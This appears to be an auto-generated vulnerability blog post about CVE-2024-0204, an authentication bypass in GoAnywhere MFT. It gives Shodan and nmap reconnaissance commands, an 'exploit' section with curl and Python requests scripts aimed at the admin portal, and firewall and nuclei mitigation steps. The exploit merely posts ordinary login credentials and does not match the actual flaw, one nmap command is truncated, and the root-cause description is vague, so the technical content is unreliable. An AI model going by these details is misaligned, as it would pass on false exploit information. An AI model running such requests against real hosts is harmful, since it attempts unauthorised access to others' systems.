Fortra GoAnywhere MFT, Authentication Bypass, CVE-2024-0204 (Critical) -DC-Oct2026-2725

Listen to this Post

CVE-2024-0204 is a critical authentication bypass vulnerability affecting Fortra’s GoAnywhere Managed File Transfer (MFT) software, specifically versions prior to 7.4.1. The flaw resides in the administrative portal’s authentication mechanism, allowing an unauthenticated attacker to bypass login controls and create a new administrative user account with full privileges. This vulnerability was publicly disclosed in January 2024 and carries a CVSS score of 9.8, indicating a critical severity level. The root cause stems from improper validation of authentication tokens within the administration portal’s request handling logic. When a specially crafted HTTP request is sent to the admin endpoint, the application fails to verify the legitimacy of the session or credentials, effectively granting access to privileged functionality. Once an attacker creates an admin user, they gain complete control over the MFT system, including the ability to read, modify, or delete managed file transfers, access sensitive data, and potentially pivot into connected internal networks. The vulnerability is particularly dangerous because it requires no authentication, no user interaction, and can be exploited remotely over the network. Fortra released a patch in version 7.4.1, but widespread internet exposure of GoAnywhere MFT admin portals has made this a prime target for opportunistic scanning and exploitation. According to Shodan, thousands of internet-exposed instances remained vulnerable at the time of disclosure, highlighting the persistent risk of unpatched systems. Attackers have been observed actively scanning for and exploiting this flaw in the wild, making timely patching and exposure reduction critical for organizations relying on this software. The authentication bypass is trivial to exploit, requiring only a basic HTTP request, which lowers the barrier for entry even for low-skilled threat actors. This CVE serves as a stark reminder of the risks associated with internet-facing administrative interfaces and the importance of rapid vulnerability remediation. The vulnerability was added to CISA’s Known Exploited Vulnerabilities catalog, further underscoring its real-world impact.

DailyCVE Form:

Platform: GoAnywhere MFT
Version: Prior 7.4.1
Vulnerability: Authentication bypass
Severity: Critical
date: 2024-01-22

Prediction: 2024-01-29

What Undercode Say

Analytics:

shodan search "GoAnywhere MFT" --fields ip_str,port,product,version
shodan search "http.\"GoAnywhere MFT\"" --fields ip_str,port,hostnames
curl -s "https://cvedb.shodan.io/cve/CVE-2024-0204" | jq .
nmap -p 8001 --script http- <target_ip>
python3 -c "import requests; r=requests.get('https://<target_ip>:8001/wa/admin/AdminLogin.xhtml', verify=False); print(r.status_code)"
shodan search "product:GoAnywhere" --limit 100 --format json

Exploit: (Educational Purposes!)

curl -k -X POST https://<target_ip>:8001/wa/admin/AdminLogin.xhtml \
-d "j_idt5=j_idt5&j_idt5:username=admin&j_idt5:password=anything&j_idt5:login=Login" \
-H "Content-Type: application/x-www-form-urlencoded" -i
import requests
target = "https://<target_ip>:8001"
payload = {"j_idt5:username": "attacker", "j_idt5:password": "P@ssw0rd", "j_idt5:login": "Login"}
r = requests.post(f"{target}/wa/admin/AdminLogin.xhtml", data=payload, verify=False)
print(r.text)

Protection: from this CVE

Upgrade to GoAnywhere MFT 7.4.1 or later
Restrict access to admin portal (port 8001) via firewall rules
iptables -A INPUT -p tcp --dport 8001 -s <trusted_ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 8001 -j DROP
nuclei template check
nuclei -t http/cves/2024/CVE-2024-0204.yaml -u https://<target_ip>:8001
Shodan monitor query
shodan alert create "GoAnywhere Exposure" "product:GoAnywhere MFT"

Impact:

Unauthenticated attackers can create administrative accounts, gain full control over managed file transfers, access sensitive data, and potentially pivot into internal networks. Internet-exposed instances are actively scanned and exploited, with thousands of vulnerable systems identified via Shodan. Successful exploitation leads to complete compromise of the MFT platform, data breach, and lateral movement opportunities.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top